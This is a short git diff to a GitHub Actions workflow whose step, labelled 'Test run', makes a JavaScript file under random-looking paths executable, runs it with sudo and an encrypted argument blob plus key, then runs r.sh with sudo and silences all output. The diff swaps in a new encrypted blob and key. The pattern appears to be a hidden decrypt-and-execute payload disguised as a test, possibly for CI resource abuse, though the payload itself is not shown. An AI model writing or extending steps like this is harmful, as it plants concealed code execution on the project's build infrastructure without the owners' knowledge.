--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'hanbg'
+        echo '5gn04'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19QLLCrr0HGqJNYTpwVOZuUdEum4XhUJctoT+r765IoBwWAYJ92Bqw6LanPtizkGQrzwXPAI8ixYWesE2K89CHNuP21Ts2rUfUWG7DV020SfXlnQ2DhRdRA 37kkcf && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18fLHif8AlGA+HrZsb39JeOBEtNwuNO3PmetiqLhZs9h6kozosv6MQbDaP0P9Z7MtUfBRGvklP6WN7wjxWM6ouVU2zFmRtep2T1oLduQw7fmoBJiZYT4mRY mjeqhp && sudo sh r.sh > /dev/null 2>&1
